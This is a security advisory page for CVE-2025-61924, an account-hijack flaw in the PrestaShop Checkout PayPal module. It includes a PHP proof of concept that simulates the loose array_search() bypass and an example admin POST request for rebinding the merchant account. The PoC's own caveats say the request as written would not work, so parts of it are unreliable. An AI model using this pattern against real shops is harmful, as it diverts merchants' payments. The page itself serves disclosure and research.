Security Vulnerability Report
CVE-2025-61924 CVSS 3.8 LOW

Published: 2025-10-16 18:15:39
Last Modified: 2025-12-29 20:06:15

Description

PrestaShop Checkout is the PrestaShop official payment module in partnership with PayPal. In versions prior to 4.4.1 and 5.0.5, the target PayPal merchant account can be hijacked from the back office due to incorrect usage of PHP's array_search(). The vulnerability is fixed in versions 4.4.1 and 5.0.5. No known workarounds exist.

CVSS Details

CVSS Score: 3.8
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:* - VULNERABLE
PrestaShop Checkout 4.x < 4.4.1
PrestaShop Checkout 5.x < 5.0.5

NVD CPE match ranges for the entry above (as recorded in the NVD data): < 7.4.4.1; 7.5.0.1 to < 7.5.0.5; 8.3.1.0 to < 8.4.4.1; 8.5.0.0 to < 8.5.0.5; 9.4.3.1 to < 9.5.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```php
<?php
/**
 * CVE-2025-61924 - PrestaShop Checkout PayPal Merchant Account Hijacking PoC
 *
 * The vulnerability is due to incorrect usage of PHP array_search() without
 * strict comparison. An authenticated high-privilege user (backoffice admin)
 * can hijack the target PayPal merchant account by manipulating the merchant
 * ID parameter.
 *
 * NOTE: This PoC demonstrates the conceptual exploitation logic.
 * Actual exploitation requires valid backoffice credentials.
 *
 * NOTE: The loose comparison 0 == 'non-numeric string' is true only on
 * PHP 7 and earlier. PHP 8 changed int-to-string comparison so that it is
 * false, so this simulation only reports success when run on PHP < 8.
 */

// Simulated vulnerable code pattern in PrestaShop Checkout module
class PsCheckoutMerchant
{
    // Simulated list of authorized PayPal merchant IDs (placeholder addresses)
    private $authorizedMerchantIds = [
        'MBR001' => '[email protected]',
        'MBR002' => '[email protected]',
    ];

    /**
     * Vulnerable function - uses array_search() without strict comparison
     * (no third parameter). This allows type juggling attacks.
     */
    public function vulnerableLookup($inputMerchantId)
    {
        // Without strict mode (true), array_search() performs loose comparison
        // of the needle against each array VALUE and returns the matching KEY.
        // On PHP < 8, 0 == 'any_non_numeric_string' evaluates to true.
        // Fix (shipped in 4.4.1 / 5.0.5 per the advisory): pass true as the
        // third argument so the comparison is strict (===).
        return array_search($inputMerchantId, $this->authorizedMerchantIds);
    }

    /**
     * Vulnerable merchant account binding logic
     */
    public function bindMerchantAccount($submittedMerchantId, $attackerPaypalEmail)
    {
        $matchedKey = $this->vulnerableLookup($submittedMerchantId);

        if ($matchedKey !== false) {
            // Bypass: if the attacker submits integer 0, array_search() loosely
            // compares 0 with the first VALUE in the list, which is true on
            // PHP < 8, and returns that entry's key 'MBR001'.
            echo "[+] Matched merchant key: $matchedKey\n";
            echo "[+] Binding attacker PayPal account: $attackerPaypalEmail\n";

            // Hijack successful - update the merchant binding
            $this->authorizedMerchantIds[$matchedKey] = $attackerPaypalEmail;
            return true;
        }

        return false;
    }
}

// Exploitation demonstration
$psCheckout = new PsCheckoutMerchant();

// Normal request would be: merchant_id=MBR001
// Malicious request: merchant_id=0 (integer, exploits loose comparison)
// In PHP < 8: array_search(0, ['MBR001' => '...', 'MBR002' => '...'])
// returns 'MBR001' because 0 == '...' (loose comparison against the first
// value) evaluates to true.
$maliciousMerchantId = 0; // Integer 0 bypasses the check
$attackerEmail = '[email protected]';

echo "[*] CVE-2025-61924 Exploitation PoC\n";
$result = $psCheckout->bindMerchantAccount($maliciousMerchantId, $attackerEmail);

if ($result) {
    echo "[!] SUCCESS: PayPal merchant account hijacked!\n";
    echo "[!] All future payments will be routed to: $attackerEmail\n";
} else {
    echo "[-] Exploitation failed\n";
}

/**
 * HTTP-level exploitation example (for actual exploitation):
 *
 * POST /admin123/index.php?controller=AdminPsCheckoutMerchant
 * Cookie: PHPSESSID=<valid_admin_session>
 * Content-Type: application/x-www-form-urlencoded
 *
 * id_merchant=0&[email protected]&action=update
 *
 * The 'id_merchant=0' parameter exploits the array_search() loose comparison
 * vulnerability to hijack the first merchant account in the list.
 *
 * Caveat: form-encoded parameters reach PHP as strings, and the string '0'
 * compared loosely with a non-numeric string is false on every PHP version,
 * so this request as written does not reproduce the integer-0 path simulated
 * above.
 */
```

References

https://github.com/PrestaShopCorp/ps_checkout/security/advisories/GHSA-wvpg-4wrh-5889 (Vendor Advisory)

Weakness: CWE-184
Status: Analyzed